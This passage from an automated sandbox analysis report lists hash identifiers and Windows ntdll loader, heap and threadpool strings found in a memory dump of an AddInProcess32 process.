                                                                                                                                                                                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 1404860816-0
                                                                                                                                                                                                                                        • Opcode ID: 7f42144fd35c5115ae4f39a8b6a559e083c00a0058bbd6e9a25b57603d1cc088
                                                                                                                                                                                                                                        • Instruction ID: 33b674e3baae2083a23150ffcc1a9378de43de892bcc1965ec2f380dc9a60a43
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7f42144fd35c5115ae4f39a8b6a559e083c00a0058bbd6e9a25b57603d1cc088
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FF426E71900719DFDB61CF28C840BAAB7F5FF44314F1445A9E989EB282D770AA85CFA1
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
                                                                                                                                                                                                                                        • API String ID: 0-379654539
                                                                                                                                                                                                                                        • Opcode ID: 3ff0e57287fb6e1484bc3f6cb24d19c9f1a633fe40bf18995cd70fe9363aa4fb
                                                                                                                                                                                                                                        • Instruction ID: 712640d1f0309bb9072a0406a6a4839d70764935a1f061cddaefaaaef08879b9
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3ff0e57287fb6e1484bc3f6cb24d19c9f1a633fe40bf18995cd70fe9363aa4fb
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 76C1687410838A8FD712CF58C044B6AF7E5BF94B05F0489AEF996DB251E734CA49CB52
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • @, xrefs: 017F8591
                                                                                                                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 017F8421
                                                                                                                                                                                                                                        • \Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 017F855E
                                                                                                                                                                                                                                        • LdrpInitializeProcess, xrefs: 017F8422
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                        • API String ID: 0-1918872054
                                                                                                                                                                                                                                        • Opcode ID: 9325e85b183ad03e3a15cd832d4b57ee17acb9619113cca959df6e4a96a7cfee
                                                                                                                                                                                                                                        • Instruction ID: 12a0d698fae5a204cc2bdaa0f650d784131af86ab2040c8214a7ff0a7f1b896c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9325e85b183ad03e3a15cd832d4b57ee17acb9619113cca959df6e4a96a7cfee
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6391AB71508745AFDB22EF25CC54EABBBE8BB84744F44092EFA84D6251E374DA048B63
Strings
• RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 018321D9, 018322B1
• SXS: %s() passed the empty activation context, xrefs: 018321DE
• SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 018322B6
• .Local, xrefs: 017F28D8
Memory Dump Source
• Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
Similarity
• API ID:
• String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
• API String ID: 0-1239276146
Strings
• SXS: %s() called with invalid flags 0x%08lx, xrefs: 0183342A
• SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 01833456
• SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 01833437
• RtlDeactivateActivationContext, xrefs: 01833425, 01833432, 01833451
Memory Dump Source
• Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
Similarity
• API ID:
• String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
• API String ID: 0-1245972979
Strings
• ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 018210AE
• ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 0182106B
• ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 01820FE5
• ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01821028
Memory Dump Source
• Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
Similarity
• API ID:
• String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
• API String ID: 0-1468400865
Strings
• Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0182A992
• apphelp.dll, xrefs: 017E2462
• minkernel\ntdll\ldrinit.c, xrefs: 0182A9A2
• LdrpDynamicShimModule, xrefs: 0182A998
Memory Dump Source
• Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
Similarity
• API ID:
• String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
• API String ID: 0-176724104
Strings
• Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 017D327D
• HEAP: , xrefs: 017D3264
• HEAP[%wZ]: , xrefs: 017D3255
Memory Dump Source
• Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
Similarity
• API ID:
• String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
• API String ID: 0-617086771
Strings
Memory Dump Source
• Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
Similarity
• API ID:
• String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
• API String ID: 0-4253913091
Strings
Memory Dump Source
• Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
Similarity
• API ID: InitializeThunk
• String ID: $@
• API String ID: 2994545307-1077428164
Strings
Memory Dump Source
• Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
Similarity
• API ID:
• String ID: FilterFullPath$UseFilter$\??\
• API String ID: 0-2779062949
                                                                                                                                                                                                                                        • Opcode ID: caf98a70adb4f1c45e07bfb91eeeb2fe3c3bf65e268b92c37bdee42354a3e9bc
                                                                                                                                                                                                                                        • Instruction ID: bb7f7022bdbee12d3def1fa3ef2972429a4aeb4e741f21eadd1b37456db2e354
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: caf98a70adb4f1c45e07bfb91eeeb2fe3c3bf65e268b92c37bdee42354a3e9bc
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 80A149729416299BDB21EB68CC88BEAB7B8EF48700F1001E9E909E7250D7359F84CF50
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • Failed to allocated memory for shimmed module list, xrefs: 0182A10F
                                                                                                                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0182A121
                                                                                                                                                                                                                                        • LdrpCheckModule, xrefs: 0182A117
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                        • API String ID: 0-161242083
                                                                                                                                                                                                                                        • Opcode ID: 9bd180af797f3067094ef88ff0edfdfd1017ceac1a772859c0728a6746d3f47f
                                                                                                                                                                                                                                        • Instruction ID: 9215e1224dbbb11745d420d41427a0e1cbbbbc30830202b5612d684441b103e4
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9bd180af797f3067094ef88ff0edfdfd1017ceac1a772859c0728a6746d3f47f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9671CF70A00206DFDB29DF68C988ABEB7F4FF48704F14446DE902E7655E674AA81CB50
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                                        • API String ID: 0-1334570610
                                                                                                                                                                                                                                        • Opcode ID: 3f71b36b70997a0d715d57bc478b94bcd09613199db05e6e68256fee7a4eb7fe
                                                                                                                                                                                                                                        • Instruction ID: 5b335b50209ff490f1f5f325a00b4ce040c7530dd0b28b5d1f11781b9a5f8418
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3f71b36b70997a0d715d57bc478b94bcd09613199db05e6e68256fee7a4eb7fe
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B1618D706043059FDB29CF28C884BAAFBF1FF45704F14959AE459CB296D770E981CB91
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • LdrpInitializePerUserWindowsDirectory, xrefs: 018382DE
                                                                                                                                                                                                                                        • minkernel\ntdll\ldrinit.c, xrefs: 018382E8
                                                                                                                                                                                                                                        • Failed to reallocate the system dirs string !, xrefs: 018382D7
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
                                                                                                                                                                                                                                        • API String ID: 0-1783798831
                                                                                                                                                                                                                                        • Opcode ID: 0d34fed6089ad284271bb8af4911a872dc0acbbdd7113e6c2be9afd5fac086b8
                                                                                                                                                                                                                                        • Instruction ID: 6dff70c88e52e4b7ca81f88f53ee4faa8a4f5a0b1624258095952f32915ee5b5
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0d34fed6089ad284271bb8af4911a872dc0acbbdd7113e6c2be9afd5fac086b8
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C64104B1500305ABC721EB68DC84F5BB7E8EF89750F14492EFA54D33A4E770DA008BA1
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • @, xrefs: 0187C1F1
                                                                                                                                                                                                                                        • PreferredUILanguages, xrefs: 0187C212
                                                                                                                                                                                                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0187C1C5
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                                                                                                                                                                                                        • API String ID: 0-2968386058
                                                                                                                                                                                                                                        • Opcode ID: 83a3450777f286b5625d6eeae8a31370d8efd242dfb950bfc0f743ca806b7991
                                                                                                                                                                                                                                        • Instruction ID: ecdb7699a7236f170cb26f87eba13e5f728add22383b8300e940ff85f83e3824
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 83a3450777f286b5625d6eeae8a31370d8efd242dfb950bfc0f743ca806b7991
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: BB416F72A1020EEBDB11DED8C895BEEBBB8AB14704F14416AE619F7280E774DB448B50
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                                                                                                                                                                                                        • API String ID: 0-1373925480
                                                                                                                                                                                                                                        • Opcode ID: 61a6d2c15f736e749cabfc1c88346065be321b1f57a504e5c27e47a0d42c93ad
                                                                                                                                                                                                                                        • Instruction ID: dcf6179ce427fe8318ad3b45764f045106a6a026b915223567cb2d9d960c7ee3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 61a6d2c15f736e749cabfc1c88346065be321b1f57a504e5c27e47a0d42c93ad
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: A5414572A0065CCBEB26DBE9C844BACBBB9FF55380F140459DD01EB781EB348A81CB11
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01844888
                                                                                                                                                                                                                                        • LdrpCheckRedirection, xrefs: 0184488F
                                                                                                                                                                                                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01844899
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                                                                                                                                                                                                        • API String ID: 0-3154609507
                                                                                                                                                                                                                                        • Opcode ID: 582472af68b6c3d53298b2d80f95781287c0227bf8e14677eaff70a1dbf02930
                                                                                                                                                                                                                                        • Instruction ID: 2c9c017746d8947a83ac8c8b682acb4b9ebad0ff5acae2d02089c106dfa3642c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 582472af68b6c3d53298b2d80f95781287c0227bf8e14677eaff70a1dbf02930
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3341C172A0475D9BEB21CE6CD840B26BBE4AF49754B050669ED48D7312EB31DA01CB91
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                                                                                                                                                                                                        • API String ID: 0-2558761708
                                                                                                                                                                                                                                        • Opcode ID: 82d949fd489393ea1f7d5f8783db89e302ac4e1387ffae9c2b1ad3494e91066f
                                                                                                                                                                                                                                        • Instruction ID: 20d0f4ea872148cef177bc052e1b5adb6f79f0eb6ee55264086e83b674c31fe1
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 82d949fd489393ea1f7d5f8783db89e302ac4e1387ffae9c2b1ad3494e91066f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9D11E4B1358155DFDB1ADA18C8D4BB9F7B4EF40B15F188159F406CB255D730D980C751
Strings
• LdrpInitializationFailure, xrefs: 018420FA
• Process initialization failed with status 0x%08lx, xrefs: 018420F3
• minkernel\ntdll\ldrinit.c, xrefs: 01842104
Memory Dump Source
• Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
Similarity
• API ID:
• String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
• API String ID: 0-2986994758
• Opcode ID: 5e1e463164f0612cbe1440ec4c5bbeec662cf4cce049a36b04156f0beaa6b21e
• Instruction ID: 48ce5c93b1c7d815137ff0603ea41995b8b63a8db19b8aa5221932bceb10a4d2
• Opcode Fuzzy Hash: 5e1e463164f0612cbe1440ec4c5bbeec662cf4cce049a36b04156f0beaa6b21e
• Instruction Fuzzy Hash: D6F0FC7568070C7BE724D64CDC53F957769FB84B54F540069FB00B7281D5F0AB44CA91

APIs
Strings
Memory Dump Source
• Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
Similarity
• API ID: ___swprintf_l
• String ID: #%u
• API String ID: 48624451-232158463
• Opcode ID: f2c1d0e6d7fb93ae00281e043088e6ba46e1c992e13a958672b2ac88d739f918
• Instruction ID: ac07dd888861d5b9a24131d703e6acd3bdaf6673bf08464ac3b3c4c47d775832
• Opcode Fuzzy Hash: f2c1d0e6d7fb93ae00281e043088e6ba46e1c992e13a958672b2ac88d739f918
• Instruction Fuzzy Hash: B8712871A0015A9FDB02DFA8C994FAEBBF8FF18704F144065E905E7251EA74EE41CBA1

Strings
• LdrResSearchResource Exit, xrefs: 017CAA25
• LdrResSearchResource Enter, xrefs: 017CAA13
Memory Dump Source
• Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
Similarity
• API ID:
• String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
• API String ID: 0-4066393604
• Opcode ID: efdcea861e5d973f7ceebcd65c63ffbd46b31263ffb01c91f2821a738c2667d7
• Instruction ID: 0df97b9e729912e0f45db97d90c22576525f58e4f3f34ae3fd94788c2a6e0624
• Opcode Fuzzy Hash: efdcea861e5d973f7ceebcd65c63ffbd46b31263ffb01c91f2821a738c2667d7
• Instruction Fuzzy Hash: C0E17271A0061D9BEB228E9CC954BAEFBBAFF18715F10456EED01E7251E7349A80CB50

Strings
Memory Dump Source
• Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
Similarity
• API ID:
• String ID: `$`
• API String ID: 0-197956300
• Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
• Instruction ID: 6de16cfbf43e9ebf7cdeef4df788677c1753e3e5046700b225a5335c5d3d3785
• Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
• Instruction Fuzzy Hash: EDC1D4312043469BEB29EF28C841B2BBBE5AFC4318F184A2EF695C72D0D775D645CB52

Strings
Memory Dump Source
• Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
Similarity
• API ID: InitializeThunk
• String ID: Legacy$UEFI
• API String ID: 2994545307-634100481
• Opcode ID: 0399193a6ae080030ee31949f4135c230d934b94f8d5e313b29d94ca48d99813
• Instruction ID: 8bc1ad0ba57b796f0f4fcb3588aa04ec006cf47bbfbacfe6517a36ee0156107b
• Opcode Fuzzy Hash: 0399193a6ae080030ee31949f4135c230d934b94f8d5e313b29d94ca48d99813
• Instruction Fuzzy Hash: C2615071E003199FDB15DFA8C840BAEBBB5FB88704F58406DE649EB291D771AA40CB90

Strings
Memory Dump Source
• Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
Similarity
• API ID:
• String ID: @$MUI
• API String ID: 0-17815947
• Opcode ID: 2971db773c12b2477fbf7ed97cd1fd9c49fc62cec1d2cc0a04edf872bf4adecd
• Instruction ID: eed4623597cae992e142874549a43a3d626ab54172aa437781bf69e8d452507a
• Opcode Fuzzy Hash: 2971db773c12b2477fbf7ed97cd1fd9c49fc62cec1d2cc0a04edf872bf4adecd
• Instruction Fuzzy Hash: 7B5117B1E0021DAEDB11DFA9CC99EEEBBBDEB48754F100529F611F7290D6709A05CB60

Strings
• TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 017C063D
• kLsE, xrefs: 017C0540
Memory Dump Source
• Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
Similarity
• API ID:
• String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
• API String ID: 0-2547482624
• Opcode ID: 404b1e02f1490f73dbab7048efbac8d77a7345fd9c38ca10a4d430e7446ca2b5
• Instruction ID: 06e4433cc0e889775d266104c9efbb07ba8983adb25954440d526f8ea7a1fcc6
• Opcode Fuzzy Hash: 404b1e02f1490f73dbab7048efbac8d77a7345fd9c38ca10a4d430e7446ca2b5
• Instruction Fuzzy Hash: CA518A79504742CFD725DF28C584AA7FBE4AF84B04F20492EEAAA87241E770D545CFD2

Strings
• RtlpResUltimateFallbackInfo Enter, xrefs: 017CA2FB
• RtlpResUltimateFallbackInfo Exit, xrefs: 017CA309
Memory Dump Source
• Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
Similarity
• API ID:
• String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
• API String ID: 0-2876891731
• Opcode ID: 441f4d4d21a3fcf2db59a909a39eefb76cff4dfa4a57f3445769c01307cfe397
• Instruction ID: 0185ddf72fe2a87bf4251c37e9645c89862d9c70b368c543dadf3dc58c937821
• Opcode Fuzzy Hash: 441f4d4d21a3fcf2db59a909a39eefb76cff4dfa4a57f3445769c01307cfe397
• Instruction Fuzzy Hash: 2A41DE71A04659DBDB22CF6DC854B6EBBB5FF84B00F2440ADE900DB291E7B5DA80CB41

Strings
Memory Dump Source
• Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
Similarity
• API ID: InitializeThunk
• String ID: Cleanup Group$Threadpool!
• API String ID: 2994545307-4008356553
                                                                                                                                                                                                                                        • Opcode ID: 4007427cf3dffbf28d4f016b05a23a98149108380bb1bf7e64d52041c7dc3a7d
                                                                                                                                                                                                                                        • Instruction ID: 80eef33889c0e65a207c17531841c44bb6db73df84cc1d0259089eb88d767b15
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4007427cf3dffbf28d4f016b05a23a98149108380bb1bf7e64d52041c7dc3a7d
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: B001D1B2254704AFE322DF24CD49B16B7E8EB85725F01893DAA4CC7290E374D904CB46
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: MUI
                                                                                                                                                                                                                                        • API String ID: 0-1339004836
                                                                                                                                                                                                                                        • Opcode ID: 7a1e2af7bd18ebb9c0d5ef327e4956908005ca7fa10dd1ea048a2bf137309520
                                                                                                                                                                                                                                        • Instruction ID: 63111db99e29e914d6342dc7ee11caef6505c0dbb257aa39a833ffb604994160
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7a1e2af7bd18ebb9c0d5ef327e4956908005ca7fa10dd1ea048a2bf137309520
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1D824B75E002198BEB25CFADC884BEDFBB5BF48B10F14816DE959AB251D7309981CF90
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 0-3916222277
                                                                                                                                                                                                                                        • Opcode ID: 1bb7d4c824d296e4a45ffb608cf0a91d6faf6692f22ccd63903b6d41f4d728b0
                                                                                                                                                                                                                                        • Instruction ID: 1e71db38ba28ee84a2297aea19bd48f8bd128906fca198a0d8c3eb52a525aed8
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 1bb7d4c824d296e4a45ffb608cf0a91d6faf6692f22ccd63903b6d41f4d728b0
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6D916371940219AFEB21DF95CD89FAEBBB8EF59750F200055F600EB195EA74AE00CB91
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1519534517.0000000001790000.00000040.00001000.00020000.00000000.sdmp, Offset: 01790000, based on PE: true
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_1790000_AddInProcess32.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                        • API String ID: 0-3916222277
                                                                                                                                                                                                                                        • Opcode ID: c309b573617f169c4fc3cfb331cc3d7b8b67126af10d7a295b43761a60b91122
